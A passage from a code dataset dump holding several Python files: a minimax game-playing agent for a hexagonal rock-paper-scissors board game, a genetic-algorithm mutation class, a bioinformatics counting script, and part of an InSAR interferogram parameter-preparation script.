direction):\n r, q = position\n if direction == \"right\" and not self.isOutBound(r, q + 1):\n possible_pos = (r, q + 1)\n elif direction == \"rightUp\" and not self.isOutBound(r + 1, q):\n possible_pos = (r + 1, q)\n elif direction == \"rightDown\" and not self.isOutBound(r - 1, q + 1):\n possible_pos = (r - 1, q + 1)\n elif direction == \"left\" and not self.isOutBound(r, q - 1):\n possible_pos = (r, q - 1)\n elif direction == \"leftUp\" and not self.isOutBound(r + 1, q - 1):\n possible_pos = (r + 1, q - 1)\n elif direction == \"leftDown\" and not self.isOutBound(r - 1, q):\n possible_pos = (r - 1, q)\n else:\n return None\n return possible_pos\n\n # 如果周围有挨着的自己棋子,返回可旋转和棋子位置\n def is_my_swingable(self, my_position,gamestate):\n \n swingable = False\n center_pos = []\n i = my_position[0]\n j = my_position[1]\n for ni, nj in [(i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1), (i + 1, j - 1), (i - 1, j + 1)]:\n if not self.isOutBound(ni, nj) and gamestate.my_pos_tokens.get((ni, nj)) != None:\n center_pos.append((ni, nj))\n if len(center_pos) > 0:\n swingable = True\n return swingable, center_pos\n\n def is_op_swingable(self, op_position,gamestate):\n swingable = False\n center_pos = []\n i = op_position[0]\n j = op_position[1]\n for ni, nj in [(i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1), (i + 1, j - 1), (i - 1, j + 1)]:\n if not self.isOutBound(ni, nj) and gamestate.op_pos_tokens.get((ni, nj)) != None:\n center_pos.append((ni, nj))\n if len(center_pos) > 0:\n swingable = True\n return swingable, center_pos\n\n def preEval(self,actions_list,isopponent,gamestate,flag):\n if gamestate.mythrownum == 0 or gamestate.opthrownum == 0:\n random_action = random.choice(actions_list)\n new_actions_list = [random_action]\n return new_actions_list\n hit_pos = (5,5)\n hit_type = \" \"\n throw_type = \" \"\n if isopponent:\n tokenlist = list(gamestate.mytokens.values())\n for token in tokenlist:\n if token.state == False:\n tokenlist.remove(token)\n if gamestate.identity == \"upper\":\n for token in tokenlist:\n if token.position[0] <= -4 + gamestate.opthrownum and token.position[0] <= 0:\n hit_pos = token.position\n hit_type = token.type\n if gamestate.identity == \"lower\":\n for token in tokenlist:\n if token.position[0] >= 4 - gamestate.opthrownum and token.position[0] >= 0:\n hit_pos = token.position\n hit_type = token.type\n if hit_type == \"r\" and gamestate.optokens_p < 3:\n throw_type = \"p\"\n elif hit_type == \"p\" and gamestate.optokens_s < 3:\n throw_type = \"s\"\n elif hit_type == \"s\" and gamestate.optokens_r < 3:\n throw_type = \"r\"\n else:\n tokenlist = list(gamestate.optokens.values())\n for token in tokenlist:\n if token.state == False:\n tokenlist.remove(token)\n if gamestate.identity == \"upper\":\n for token in tokenlist:\n if token.position[0] >= 4 - gamestate.mythrownum and token.position[0] >= 0:\n hit_pos = token.position\n hit_type = token.type\n if gamestate.identity == \"lower\":\n for token in tokenlist:\n if token.position[0] <= -4 + gamestate.mythrownum and token.position[0] <= 0:\n hit_pos = token.position\n hit_type = token.type\n if hit_type == \"r\" and gamestate.mytokens_p < 3:\n throw_type = \"p\"\n elif hit_type == \"p\" and gamestate.mytokens_s < 3:\n throw_type = \"s\"\n elif hit_type == \"s\" and gamestate.mytokens_r < 3:\n throw_type = \"r\"\n \n for action in actions_list:\n if action[0] == \"THROW\" and action[1] == throw_type and action[2] == hit_pos:\n new_actions_list = [action]\n return new_actions_list\n new_actions_list = self.type_unequal(actions_list,isopponent,gamestate,flag)\n new_actions_list = self.find_important_move(new_actions_list,isopponent,gamestate)\n\n return new_actions_list\n\n def find_nearest_pos(self,side1_list,side2_list):\n nearest_distance = float('inf')\n nearest_pos = (5,5)\n for token_1 in side1_list:\n for token_2 in side2_list:\n tempDistance = self.cal_distance(token_1.position,token_2.position)\n if tempDistance < nearest_distance:\n nearest_distance = tempDistance\n nearest_pos = token_1.position\n return nearest_pos\n\n def find_important_move(self,actions_list,isopponent,gamestate):\n my_r = gamestate.mytokens_r\n my_p = gamestate.mytokens_p\n my_s = gamestate.mytokens_s\n op_r = gamestate.optokens_r\n op_p = gamestate.optokens_p\n op_s = gamestate.optokens_s\n \n if (my_r != 0 and op_r != 0 and my_p + my_s + op_p + op_s == 0):\n return actions_list\n if (my_p != 0 and op_p != 0 and my_r + my_s + op_r + op_s == 0):\n return actions_list\n if (my_s != 0 and op_s != 0 and my_p + my_r + op_p + op_r == 0):\n return actions_list\n if (op_s + op_p + op_r == 0) or (my_s + my_p + my_r == 0):\n return actions_list\n \n\n op_r_list = []\n op_p_list = []\n op_s_list = []\n my_r_list = []\n my_p_list = []\n my_s_list = []\n\n optokenlist = list(gamestate.optokens.values())\n for token in optokenlist:\n if token.state == False:\n optokenlist.remove(token)\n mytokenlist = list(gamestate.mytokens.values())\n for token in mytokenlist:\n if token.state == False:\n mytokenlist.remove(token)\n\n for token in optokenlist:\n if token.type == \"r\":\n op_r_list.append(token)\n if token.type == \"s\":\n op_s_list.append(token) \n if token.type == \"p\":\n op_p_list.append(token) \n for token in mytokenlist:\n if token.type == \"r\":\n my_r_list.append(token) \n if token.type == \"s\":\n my_s_list.append(token) \n if token.type == \"p\":\n my_p_list.append(token) \n \n newList = []\n if isopponent:\n if op_r != 0:\n if my_p != 0:\n nearest_pos = self.find_nearest_pos(op_r_list,my_p_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if my_s != 0:\n nearest_pos = self.find_nearest_pos(op_r_list,my_s_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if op_p != 0:\n if my_r != 0:\n nearest_pos = self.find_nearest_pos(op_p_list,my_r_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if my_s != 0:\n nearest_pos = self.find_nearest_pos(op_p_list,my_s_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if op_s != 0:\n if my_p != 0:\n nearest_pos = self.find_nearest_pos(op_s_list,my_p_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if my_r != 0:\n nearest_pos = self.find_nearest_pos(op_s_list,my_r_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n else:\n if my_r != 0:\n if op_p != 0:\n nearest_pos = self.find_nearest_pos(my_r_list,op_p_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if op_s != 0:\n nearest_pos = self.find_nearest_pos(my_r_list,op_s_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if my_p != 0:\n if op_r != 0:\n nearest_pos = self.find_nearest_pos(my_p_list,op_r_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if op_s != 0:\n nearest_pos = self.find_nearest_pos(my_p_list,op_s_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if my_s != 0:\n if op_p != 0:\n nearest_pos = self.find_nearest_pos(my_s_list,op_p_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n if op_r != 0:\n nearest_pos = self.find_nearest_pos(my_s_list,op_r_list)\n for action in actions_list:\n if action[1] == nearest_pos:\n newList.append(action)\n for action in actions_list:\n if action[0] == \"THROW\":\n newList.append(action)\n return list(set(newList))\n \n \n\n\n def type_unequal(self,actions_list,isopponent,gamestate,flag):\n my_r = gamestate.mytokens_r\n my_p = gamestate.mytokens_p\n my_s = gamestate.mytokens_s\n op_r = gamestate.optokens_r\n op_p = gamestate.optokens_p\n op_s = gamestate.optokens_s\n newList = []\n if isopponent:\n if gamestate.opthrownum <= 4:\n \n if my_p > op_s:\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"s\",\"p\")\n if near_action != None:\n newList.append(near_action)\n if my_s > op_r:\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"r\",\"s\")\n if near_action != None:\n newList.append(near_action)\n if my_r > op_p:\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"p\",\"r\")\n if near_action != None:\n newList.append(near_action)\n for action in actions_list:\n if action[0] != \"THROW\":\n newList.append(action)\n return newList\n \n if (op_r == 0 and my_s != 0) or (my_s - op_r > 1):\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"r\",\"s\")\n if near_action != None:\n newList.append(near_action)\n if (op_p == 0 and my_r != 0) or (my_r - op_p > 1):\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"p\",\"r\")\n if near_action != None:\n newList.append(near_action)\n if (op_s == 0 and my_p != 0) or (my_p - op_s > 1):\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"s\",\"p\")\n if near_action != None:\n newList.append(near_action)\n for action in actions_list:\n if action[0] != \"THROW\":\n newList.append(action)\n return newList\n ##our side\n else:\n if gamestate.mythrownum <= 4:\n\n if op_p > my_s:\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"s\",\"p\")\n if near_action != None:\n newList.append(near_action)\n if op_s > my_r:\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"r\",\"s\")\n if near_action != None:\n newList.append(near_action)\n if op_r > my_p:\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"p\",\"r\")\n if near_action != None:\n newList.append(near_action)\n for action in actions_list:\n if action[0] != \"THROW\":\n newList.append(action)\n if flag == 1:\n print(\"op_p: \",op_p,\"op_s: \",op_s,\"op_r: \",op_r,\"my_p: \",my_p,\"my_s: \",my_s,\"my_r: \",my_r)\n return newList\n\n if (my_s == 0 and op_p != 0) or (op_p - my_s > 1):\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"s\",\"p\")\n if near_action != None:\n newList.append(near_action)\n if (my_r == 0 and op_s != 0) or (op_s - my_r > 1):\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"r\",\"s\")\n if near_action != None:\n newList.append(near_action)\n if (my_p == 0 and op_r != 0) or (op_r - my_p > 1):\n near_action = self.find_nearest_action(isopponent,actions_list,gamestate,\"p\",\"r\")\n if near_action != None:\n newList.append(near_action)\n for action in actions_list:\n if action[0] != \"THROW\":\n newList.append(action)\n return newList\n\n\n\n def find_nearest_action(self,isopponent,actions_list,gamestate,type1,type2):\n if isopponent:\n tokenlist = list(gamestate.mytokens.values())\n for token in tokenlist:\n if token.state == False:\n tokenlist.remove(token)\n\n\n nearest_distance = float('inf')\n nearest_action = None\n for token in tokenlist:\n if token.type == type2:\n for action in actions_list:\n if action[1] == type1:\n tempDistance = self.cal_distance(action[2],token.position)\n if tempDistance < nearest_distance:\n nearest_distance = tempDistance\n nearest_action = action\n return nearest_action\n \n else:\n tokenlist = list(gamestate.optokens.values())\n for token in tokenlist:\n if token.state == False:\n tokenlist.remove(token)\n\n nearest_distance = float('inf')\n nearest_action = None\n for token in tokenlist:\n if token.type == type2:\n for action in actions_list:\n if action[1] == type1:\n tempDistance = self.cal_distance(action[2],token.position)\n if tempDistance < nearest_distance:\n nearest_distance = tempDistance\n nearest_action = action\n return nearest_action\n\n def find_my_possible_actions(self,gamestate,flag):\n actions_list = []\n types = [\"s\", \"r\", \"p\"]\n if gamestate.mythrownum in range(0, 9):\n throw_pos = self.find_possible_throw(gamestate)\n #print(throw_pos)\n for pos in throw_pos:\n for type in types:\n actions_list.append((\"THROW\", type, pos))\n for mytoken in list(gamestate.mytokens.values()):\n # if token is alive\n if mytoken.state:\n slide_position = self.find_possible_slide(False,mytoken.position,mytoken.type,gamestate)\n for pos in slide_position:\n actions_list.append((\"SLIDE\", mytoken.position, pos))\n swingable, center_pos = self.is_my_swingable(mytoken.position,gamestate)\n if swingable:\n swing_position = self.find_possible_swing(mytoken.position, center_pos)\n for pos in swing_position:\n if pos != None:\n actions_list.append((\"SWING\", mytoken.position, pos))\n actions_list = self.my_action_cut_off(actions_list,gamestate)\n if gamestate.mythrownum < 9:\n actions_list = self.preEval(actions_list,False,gamestate,flag)\n \n return actions_list\n\n\n def find_op_possible_actions(self,gamestate,flag):\n actions_list = []\n types = [\"s\", \"r\", \"p\"]\n if gamestate.opthrownum in range(0, 9):\n throw_pos = self.find_op_possible_throw(gamestate)\n for pos in throw_pos:\n for type in types:\n actions_list.append((\"THROW\", type, pos))\n for optoken in list(gamestate.optokens.values()):\n # if token is alive\n if optoken.state:\n slide_position = self.find_possible_slide(True,optoken.position,optoken.type,gamestate)\n for pos in slide_position:\n actions_list.append((\"SLIDE\", optoken.position, pos))\n swingable, center_pos = self.is_op_swingable(optoken.position,gamestate)\n if swingable:\n swing_position = self.find_possible_swing(optoken.position, center_pos)\n for pos in swing_position:\n if pos != None:\n actions_list.append((\"SWING\", optoken.position, pos))\n actions_list = self.op_action_cut_off(actions_list,gamestate)\n if gamestate.opthrownum < 9:\n actions_list = self.preEval(actions_list,True,gamestate,flag)\n return actions_list\n \n def minimax_decision(self):\n utilityList = []\n temp_gamestate = copy.deepcopy(self.gamestate)\n \n my_action_list = self.find_my_possible_actions(temp_gamestate,1)\n currMax = -float('inf')\n for my_action in my_action_list:\n deepth = 0\n utility = self.min_value(my_action,temp_gamestate,deepth,currMax)\n utilityList.append(utility)\n if currMax < utility: currMax = utility\n print(my_action_list)\n print(utilityList)\n dicided_action = my_action_list[utilityList.index(max(utilityList))]\n return dicided_action\n\n def min_value(self,my_action,gamestate,deepth,currMax):\n deepth += 1\n #print(deepth)\n utilityList = []\n op_action_list = self.find_op_possible_actions(gamestate,0)\n currMin = float('inf')\n count = 0\n for op_action in op_action_list:\n count += 1\n utility = self.max_value(my_action,op_action,gamestate,deepth,currMin)\n utilityList.append(utility)\n try:\n if currMin > utility: currMin = utility\n except:\n print(\"catch op_action_list!\",op_action_list)\n print(\"catch op_action!\",op_action)\n print(\"catch previous my_action!\",my_action)\n print(\"catch deepth!!\",deepth)\n print(\"catch utility!!!\",utility)\n print(\"catch count!!!\",count)\n else:\n if currMax >= utility: break\n try:\n utility = min(utilityList)\n except ValueError:\n self.find_op_possible_actions(gamestate,0)\n print(\"catch error\",my_action)\n\n #print(op_action_list)\n #print(utilityList)\n else:\n count = 0\n return utility\n \n def max_value(self,my_action,op_action,gamestate,deepth,currMin):\n deepth += 1\n newstate = copy.deepcopy(gamestate)\n newstate.update(my_action,op_action)\n #print(newstate.op_pos_tokens)\n if self.isEnd(newstate,deepth):\n utility = self.new_evaluate(newstate)\n return utility\n else:\n my_action_list = self.find_my_possible_actions(newstate,0)\n utilityList = []\n count = 0\n currMax = -float('inf')\n for new_my_action in my_action_list:\n count += 1\n utility = self.min_value(new_my_action,newstate,deepth,currMax)\n utilityList.append(utility)\n try:\n if currMax < utility: currMax = utility\n except:\n print(\"catch my_action_list!\",my_action_list)\n print(\"catch new_my_action!\",new_my_action)\n print(\"catch previous my_action!\",my_action)\n print(\"catch previous op_action!\",op_action)\n print(\"catch deepth!!\",deepth)\n print(\"catch utility!!!\",utility)\n print(\"catch count!!!\",count)\n else:\n if currMin <= utility: break\n try:\n utility = max(utilityList)\n except ValueError:\n self.find_my_possible_actions(newstate,0)\n print(\"catch error\",my_action_list)\n else:\n return utility\n\n def isEnd(self,gamestate,deepth):\n if gamestate.mytokens_death_num == 9 or gamestate.optokens_death_num == 9 or deepth == 4 or self.isDraw(gamestate):\n return True\n else: return False\n \n def isDraw(self,gamestate):\n if gamestate.mytokens_on_num == 9 and gamestate.optokens_on_num == 9:\n my_tokens_type = []\n opponent_tokens_type = []\n for my_key in gamestate.mytokens:\n if gamestate.mytokens[my_key].state:\n my_tokens_type.append(gamestate.mytokens[my_key].type)\n for op_key in gamestate.optokens:\n if gamestate.optokens[op_key].state:\n opponent_tokens_type.append(gamestate.optokens[op_key].type)\n my_tokens_type = set(my_tokens_type)\n opponent_tokens_type = set(opponent_tokens_type)\n if len(my_tokens_type) == 1 and len(opponent_tokens_type) == 1 and len(my_tokens_type - opponent_tokens_type) == 0:\n return True\n if len(my_tokens_type) == 2 and len(opponent_tokens_type) == 2 and len(my_tokens_type - opponent_tokens_type) == 0:\n return True\n if (my_tokens_type == {'s','r'} and opponent_tokens_type == {'r'}) or (my_tokens_type == {'r'} and opponent_tokens_type == {'s','r'}):\n return True\n if (my_tokens_type == {'p','r'} and opponent_tokens_type == {'p'}) or (my_tokens_type == {'p'} and opponent_tokens_type == {'p','r'}):\n return True\n if (my_tokens_type == {'s','p'} and opponent_tokens_type == {'s'}) or (my_tokens_type == {'s'} and opponent_tokens_type == {'s','p'}):\n return True\n return False\n\n\n ##################################################################\n\n def juduge_releation(self, my_token, opponent_token):\n releation = -1\n if my_token['type'] == opponent_token['type']:\n releation = 0\n elif (my_token['type'] == 's' and opponent_token['type'] == 'p') or (my_token['type'] == 'p' and opponent_token['type'] == 'r') or (my_token['type'] == 'r' and opponent_token['type'] == 's'):\n releation = 1\n elif (my_token['type'] == 's' and opponent_token['type'] == 'r') or (my_token['type'] == 'p' and opponent_token['type'] == 's') or (my_token['type'] == 'r' and opponent_token['type'] == 'p'):\n releation = 2\n return releation\n\n\n\n\n\n ####################################################\n\n\n def cal_distance(self,my_token_pos,opponent_token_pos):\n \n r,q = my_token_pos\n i,j = opponent_token_pos\n row_dist = abs(r - i)\n dist = row_dist\n if r <= i:\n if q >= j and i+j >= q+r:\n dist += 0\n elif i+j < q+r:\n dist += abs((q + r) - (i + j))\n else:\n dist += abs(j - q)\n else:\n if q <= j and i+j <= q+r:\n dist += 0\n elif i+j > q+r:\n dist += abs((q + r) - (i + j))\n else:\n dist += abs(q - j)\n return dist\n#######################################3\n#如果棋子种类和目标地址是相同的剪枝,如果目标位置已有自己的棋子剪枝\n def my_action_cut_off(self,action_list,state):\n new_list = []\n position_dic = {}\n for action in action_list:\n if action[2] in state.my_pos_tokens:\n continue\n else:\n if action[0]==\"THROW\":\n type_position= (action[1],action[2])\n else:\n my_index = state.my_pos_tokens[action[1]][0]\n my_type = state.mytokens[my_index].type\n type_position = (my_type,action[2])\n if not type_position in position_dic:\n position_dic[type_position] = action\n #如果目标不为空首先保留swing,然后slide,然后throw\n elif action[0] == \"SWING\":\n position_dic[type_position] = action\n elif action[0] == \"SLIDE\" and position_dic[type_position][0] == \"THROW\":\n position_dic[type_position] = action\n else:\n continue\n new_list = list(position_dic.values())\n if len(new_list) == 0:\n print(\"my_old actions list\",action_list)\n return new_list\n\n def op_action_cut_off(self,action_list,state):\n new_list = []\n position_dic = {}\n for action in action_list:\n if action[2] in state.op_pos_tokens:\n continue\n else:\n if action[0]==\"THROW\":\n type_position= (action[1],action[2])\n else:\n op_index = state.op_pos_tokens[action[1]][0]\n op_type = state.optokens[op_index].type\n type_position = (op_type,action[2])\n if not type_position in position_dic:\n position_dic[type_position] = action\n #如果目标不为空首先保留swing,然后slide,然后throw\n elif action[0] == \"SWING\":\n position_dic[type_position] = action\n elif action[0] == \"SLIDE\" and position_dic[type_position][0] == \"THROW\":\n position_dic[type_position] = action\n else:\n continue\n new_list = list(position_dic.values())\n if len(new_list) == 0:\n print(\"old actions list\",action_list)\n return new_list\n\n\n\n def new_evaluate(self,gamestate):\n\n utility = 0\n \n # 我的每一个手势与敌人每一个手势的优劣,如果手势一样,对分数无影响,如果是压制关系,距离越近,分数越大,如果是被压制关系,距离���远,分数越大\n for my_key in gamestate.mytokens:\n for op_key in gamestate.optokens:\n if gamestate.mytokens[my_key].state :\n my_token = gamestate.mytokens[my_key]\n if gamestate.optokens[op_key].state :\n opponent_token = gamestate.optokens[op_key]\n releation = gamestate.get_relation(my_token, opponent_token)\n if releation == 0:\n continue\n elif releation == 1:\n distance = self.cal_distance(my_token.position, opponent_token.position)\n if distance == 0:\n return float('inf')\n utility += 1000/distance\n elif releation == 2:\n distance = self.cal_distance(my_token.position, opponent_token.position)\n if distance == 0:\n return -float('inf')\n utility -= 100/distance\n else:\n print(\"judge_releation return wrong result\")\n # # 克制对方的种类越多值越大\n # if gamestate.mytokens_s > gamestate.optokens_p and gamestate.optokens_p != 0:\n # utility += 10\n # if gamestate.mytokens_r > gamestate.optokens_s and gamestate.optokens_p != 0:\n # utility += 10\n # if gamestate.mytokens_p > gamestate.optokens_r and gamestate.optokens_p != 0:\n # utility += 10\n # if gamestate.optokens_p > gamestate.mytokens_r and gamestate.mytokens_r != 0:\n # utility -= 10\n # if gamestate.optokens_s > gamestate.mytokens_p and gamestate.mytokens_p != 0:\n # utility -= 10\n # if gamestate.optokens_r > gamestate.mytokens_s and gamestate.mytokens_s != 0:\n # utility -= 10\n\n #每次方子死亡失去巨大utility\n utility -= 10000 * gamestate.mytokens_death_num\n utility += 10000 * gamestate.optokens_death_num\n if utility == None:\n utility = -90000\n return utility","sub_path":"test (2)/team_name_copy/player3.py","file_name":"player3.py","file_ext":"py","file_size_in_byte":38271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"122760457","text":"from geneticalgorithm.bounded.boundedmutationfunctor import BoundedMutationFunctor\n\nclass Reinitialization(BoundedMutationFunctor):\n\n def __init__(self, inner, lower_boundary, upper_boundary, generator):\n super(Reinitialization, self).__init__(inner, lower_boundary, upper_boundary)\n self.generator = generator\n\n def mutate(self, original):\n new = self.inner.mutate(original)\n if self._isoutside(new):\n new = self.generator.generate(1)[0]\n return new","sub_path":"geneticalgorithm/bounded/reinitialization.py","file_name":"reinitialization.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"308125488","text":"import bioLibCG\nimport cgNexusFlat\n\ndef countContext(targetList, alignmentFile, outFN):\n\n targets = set()\n f = open(targetList, 'r')\n for line in f:\n ls = line.strip().split('\\t')\n targets.add(ls[0])\n f.close()\n\n type_count = {}\n f = open(alignmentFile, 'r')\n for line in f:\n ls = line.strip().split('\\t')\n aID = ls[0]\n type = ls[17]\n \n if aID in targets:\n type_count[type] = type_count.get(type, 0) + 1\n \n f.close()\n\n f = open(outFN, 'w')\n for type in type_count:\n f.write('%s: %s\\n' % (type, type_count[type]))\n f.close()\n\n \n\nif __name__ == \"__main__\":\n import sys\n if sys.argv[1] == \"help\":\n bioLibCG.gd(sys.argv[0])\n else:\n bioLibCG.submitArgs(globals()[sys.argv[1]], sys.argv[1:])\n","sub_path":"endoClip/runK50GU/countContextTargets.py","file_name":"countContextTargets.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"632885296","text":"import numpy as np\nfrom datetime import datetime\nfrom numpy.linalg import pinv\n\n\n# def parpre_step(obs,shortbaseline,num,wavelen,slantran,incangle,\n# spa_r,spa_azi,width,lines,interval_r,interval_azi,radius,\n# ref_point=1,ref_slc=1):\n# '''\n# PARPRE is used to prepare the general input parameters for the estimators\n# \n# Input: obs-------------------observation file (range,azimuth,longitude,latitude,ifg1,ifg2,....)\n# shortbaseline---------baseline file (im1 im2 B_p, B_t)\n# num-------------------number of sampled points for joint detrend\n# wavelen---------------the wavelength of the SAR signal(meters)\n# slantran--------------the slant range to teh center pixel\n# incangle--------------the incidence angle (center pixel)\n# spa_r-----------------spatial resolution in range direction\n# spa_azi---------------spatial resolution in azimuth direction\n# width-----------------range samples of interferogram\n# lines-----------------azimuth lines of interferogram\n# interval_r------------the grid interval in range direction used for networking\n# interval_azi----------the grid interval in azimuth direction used for networking\n# radius----------------the searching radius used for networking\n# ref_point-------------reference point index\n# ref_slc---------------reference slc index\n#\n# Output: obs = observation file (range,azimuth,longitude,latitude,ifg1,ifg2,....)\n# Input.baseline = the spatial baseline of the selected interf.\n# Input.interval = the time span of the neighboring SLCs\n# Input.pindex = the pair index showing the construction of interf.\n# Input.tmatrix = the temporal matrix corresponding to the defo. rates\n# Input.wavelen = the wavelength of the SAR signal\n# Input.slantran = the slant range to teh center pixel\n# Input.incangle = the incidence angle (center pixel)\n# Input.spa_r = spatial resolution in range direction\n# Input.spa_azi = spatial resolution in azimuth direction\n# Input.width = range samples of interferogram\n# Input.lines = azimuth lines of interferogram\n# Input.interval_r=the grid interval in range direction used for networking\n# Input.interval_azi=the grid interval in azimuth direction used for networking\n# Input.radius = the searching radius used for networking\n# Input.ref_point= reference point index\n# Input.ref_slc = reference slc index\n# Input.date = SAR data acquisition date\n# Input.sb = shortbaseline file\n# Input.NTCP = number of TCP points\n# Input.num = number of sampled points for joint detrend\n# Input.NIFG = number of interferograms\n# Input.NSLC = number of SLC\n# Input.h2p = design matrix for topographic error\n# Input.T_year = vector of temporal interval in unit of year\n# Input.T_year_matrix= matrix of temporal interval in unit of year\n# Input.B_t = sparse matrix of temporal interval in unit of year\n# Input.B_t2p = design matrix for vi\n# Input.B_t2p_sum= design matrix for deformation rate\n# Input.B_vi = design matrix for both topographic error and vi\n# Input.B_v = design matrix for both topographic error and rate\n# Input.B_di = design matrix for both topographic error and di\n# Input.B_t2p_di = design matrix for di\n# Input.CoreNum = number of workers to start on local machine numworks in Matlab\n# Input.num_threshold= threshold of number of points to be discarded in subset detection\n# Input.patch_num_2= patch number index in subset detection (total patch number = (patch_num_2^2)*(patch_num_2^2))\n# Input.arc_threshold=threshold of residual for arcs to be removed\n# Input.NTCP_SAMP= number of TCP points in sample\n# Input.NARC = number of arcs\n# '''\n\nimport scipy.io as sio\nimport pandas as pd\nobs = sio.loadmat('obs.mat')['obs']\nshortbaseline = np.array(pd.read_csv('shortbaseline', delimiter='\\s+',\n names=['SCE1', 'SCE2', 'Bp', 'Bt']))\n\nnum,wavelen,slantran,incangle,spa_r,spa_azi,width,lines,interval_r,interval_azi,radius = \\\n 80000,0.031228381041666666,667425.0045,20.1048,11.181454768277943,11.313365,760,640,300,300,700\n\nref_point=1; ref_slc=1\n\nSCE12 = shortbaseline[:, [0, 1]]\nSCE = np.unique(SCE12).reshape(-1, 1)\nNSLC = len(SCE)\nNIFG, imp_size2 = SCE12.shape\ninput_pair_index = np.zeros((NIFG, imp_size2), dtype='int')\nfor i in range(NSLC):\n n = (SCE12 == SCE[i])\n input_pair_index[n] = i\n\n# create an interval matrix\nNinterval = NSLC - 1\ninput_matrix_t = np.zeros((NIFG, Ninterval))\nfor ii in range(NIFG):\n st = input_pair_index[ii, 0]\n ed = input_pair_index[ii, 1]\n input_matrix_t[ii, list(np.arange(st, ed))] = 1\n\n\nse_pair_index = np.hstack((np.arange(0, NSLC-1).reshape(-1, 1), np.arange(1, NSLC).reshape(-1, 1)))\nBp = shortbaseline[:, 2].reshape(-1, 1)\ninput_t_interval = np.zeros((Ninterval, 1))\n\nfor iii in range(Ninterval):\n s_d = datetime.strptime(str(int(SCE[iii])), '%Y%m%d')\n e_d = datetime.strptime(str(int(SCE[iii + 1])), '%Y%m%d')\n input_t_interval[iii] = (e_d - s_d).days\n\n## design matrix for dem error\nh2p = (-4 * np.pi / wavelen) * Bp / (slantran * np.sin(np.deg2rad(incangle)))\n\n## T_year\nT_year = (np.abs(input_t_interval) / 365).T\nT_year_matrix = np.tile(T_year, (NIFG, 1))\n\n## design matrix for coseismic deformation\nco_index = 1\ninv2inv_matrix = np.zeros((Ninterval, Ninterval))\nfor i in range(Ninterval):\n if i < co_index:\n inv2inv_matrix[i, i] = 1\n inv2inv_matrix[i, i+1] = -1\n elif i == co_index:\n inv2inv_matrix[i, i] = 1\n else:\n inv2inv_matrix[i, i] = 1\n inv2inv_matrix[i, i-1] = -1\nB_coseis_t2p_di = (-4*np.pi/wavelen)*(input_matrix_t@inv2inv_matrix)*1e-3\n\n## design matrix for coseismic deformation rate new\nco_index = 0\nif co_index == 0:\n inv_cosei_matrix = np.zeros((Ninterval, 2))\n inv_cosei_matrix[co_index, 0] = 1\n inv_cosei_matrix[co_index + 1:, 1] = 1\n# dead part\n# elseif\n# co_index == Ninterval\n# inv_cosei_matrix = zeros(Ninterval, 2);\n# inv_cosei_matrix(Ninterval, 2) = 1;\n# inv_cosei_matrix(1: co_index - 1, 1)=1;\n# else\n# inv_cosei_matrix = zeros(Ninterval, 3);\n# inv_cosei_matrix(co_index, 2) = 1;\n# inv_cosei_matrix(1: co_index - 1, 1)=1;\n# inv_cosei_matrix(co_index + 1: end, 3)=1;\n# end\n\n## design matrix for sequential ifg\nPROJ_LS = pinv(input_matrix_t.T @ input_matrix_t)@input_matrix_t.T\nBp_se = PROJ_LS @ Bp\nh2p_coef = (-4 * np.pi / wavelen) / (slantran * np.sin(np.deg2rad(incangle)))\nh2p_se = h2p_coef * Bp_se\n\n## design matrix for deforate\nB_t = input_matrix_t * T_year_matrix\nB_t_se = np.diag(T_year.squeeze())\nB_t_sum = np.sum(B_t, 1).reshape(-1, 1)\nB_t_se_sum = np.sum(B_t_se, 1).reshape(-1, 1)\nB_t2p = (-4 * np.pi / wavelen) * B_t * 1e-3\nB_t2p_se = (-4 * np.pi / wavelen) * B_t_se * 1e-3\nB_t2p_sum = (-4 * np.pi / wavelen) * B_t_sum * 1e-3\nB_t2p_se_sum = (-4 * np.pi / wavelen) * B_t_se_sum * 1e-3\nB_t2p_di = (-4 * np.pi / wavelen) * input_matrix_t * 1e-3\nB_t2p_vi_coseis = (-4 * np.pi / wavelen) * B_t @ inv_cosei_matrix * 1e-3\n\n## design matrix combination\nB_vi = np.hstack((h2p, B_t2p))\nB_vi_se = np.hstack((h2p_se, B_t2p_se))\nB_v = np.hstack((h2p, B_t2p_sum))\nB_v_se = np.hstack((h2p_se, B_t2p_se_sum))\nB_di = np.hstack((h2p, B_t2p_di))\nB_coseis_di = np.hstack((h2p, B_coseis_t2p_di))\n\n## temporal low pass deformation model\n#TODO: fix matrix indexing is flattened in matlab\nT_year_cum = np.cumsum(T_year)\nM = np.zeros((Ninterval, 3))\nM[:, 0] = 1\nM[0, 1] = T_year_cum[0] / 2\nM[0, 2] = T_year_cum[0]**2 / 6\nfor i in range(1, Ninterval):\n M[i, 1] = (T_year_cum[i] + 